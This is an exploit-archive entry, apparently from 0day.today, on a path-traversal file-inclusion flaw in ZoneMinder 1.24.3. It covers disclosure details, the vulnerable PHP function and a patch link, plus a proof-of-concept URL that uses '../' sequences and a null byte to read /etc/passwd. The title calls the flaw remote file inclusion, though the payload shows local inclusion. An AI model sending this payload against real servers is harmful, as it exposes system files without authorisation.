Search...

Zoneminder 1.24.3 Remote File Inclusion Vulnerability

2011-08-01T00:00:00

ID 1337DAY-ID-16586
Type zdt
Reporter iye
Modified 2011-08-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
 
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
 
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
 
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
 
Vulnerable Code:
 
/var/www/zm/includes/functions.php
--------------------------------------------------------
 
function getSkinFile( $file )
{
    global $skinBase;
    $skinFile = false;
    foreach ( $skinBase as $skin )
    {
        $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
        if ( file_exists( $tempSkinFile ) )
            $skinFile = $tempSkinFile;
    }
    return( $skinFile );
}
 
--------------------------------------------------------



#  0day.today [2018-02-13]  #

JSON Vulners Source

Initial Source

{"published": "2011-08-01T00:00:00", "id": "1337DAY-ID-16586", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:57:44", "bulletin": {"published": "2011-08-01T00:00:00", "id": "1337DAY-ID-16586", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 1.9, "modified": "2016-04-20T01:57:44"}}, "hash": "79fc884194b4ec2c6d0d485d9b30515935d826af90d36c6c9b60eea56bb7d455", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:57:44", "edition": 1, "title": "Zoneminder 1.24.3 Remote File Inclusion Vulnerability", "href": "http://0day.today/exploit/description/16586", "modified": "2011-08-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/16586", "references": [], "reporter": "iye", "sourceData": "# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability\r\n# Author: Iye (iye[dot]cba-at-gmail[dot]com)\r\n# Software Link: http://www.zoneminder.com/\r\n# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested\r\n# Tested on: Ubuntu 10.04\r\n \r\nYou must be authenticated as a user in the Web App to exploit it. It's\r\nnot a must to be admin.\r\n \r\nPOC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\nReported to proyect mantainer (Philip Coombes) on 2011-07-22\r\nFix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt\r\n \r\nVulnerable Code:\r\n \r\n/var/www/zm/includes/functions.php\r\n--------------------------------------------------------\r\n \r\nfunction getSkinFile( $file )\r\n{\r\n global $skinBase;\r\n $skinFile = false;\r\n foreach ( $skinBase as $skin )\r\n {\r\n $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;\r\n if ( file_exists( $tempSkinFile ) )\r\n $skinFile = $tempSkinFile;\r\n }\r\n return( $skinFile );\r\n}\r\n \r\n--------------------------------------------------------\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "f5087b0e1196e8ceb52729133a4b2c3b", "key": "sourceHref"}, {"hash": "77b762c9f213a26a824cb6fe8940c840", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1e196b6a1e64cf3a672e29f7613373a0", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "modified"}, {"hash": "8492f70cbdd67d1d1180c084dd62b01c", "key": "href"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "published"}, {"hash": "c8f2768d98b97982e54a020ee9f33d81", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "9cc4044c79b24160a7950d97c345f9da825ba9906aa389477b96e268ad4d8d4d", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-02-14T00:34:04"}, "vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-02-14T00:34:04", "edition": 2, "title": "Zoneminder 1.24.3 Remote File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/16586", "modified": "2011-08-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/16586", "references": [], "reporter": "iye", "sourceData": "# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability\r\n# Author: Iye (iye[dot]cba-at-gmail[dot]com)\r\n# Software Link: http://www.zoneminder.com/\r\n# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested\r\n# Tested on: Ubuntu 10.04\r\n \r\nYou must be authenticated as a user in the Web App to exploit it. It's\r\nnot a must to be admin.\r\n \r\nPOC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\nReported to proyect mantainer (Philip Coombes) on 2011-07-22\r\nFix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt\r\n \r\nVulnerable Code:\r\n \r\n/var/www/zm/includes/functions.php\r\n--------------------------------------------------------\r\n \r\nfunction getSkinFile( $file )\r\n{\r\n global $skinBase;\r\n $skinFile = false;\r\n foreach ( $skinBase as $skin )\r\n {\r\n $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;\r\n if ( file_exists( $tempSkinFile ) )\r\n $skinFile = $tempSkinFile;\r\n }\r\n return( $skinFile );\r\n}\r\n \r\n--------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-02-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ade7f9458c9190645da5e04033e960da", "key": "href"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "modified"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c8f2768d98b97982e54a020ee9f33d81", "key": "reporter"}, {"hash": "fed87abb680bb1f4603302fc29e54a23", "key": "sourceData"}, {"hash": "4047337aa8905eb9ce102189bf23724b", "key": "sourceHref"}, {"hash": "77b762c9f213a26a824cb6fe8940c840", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}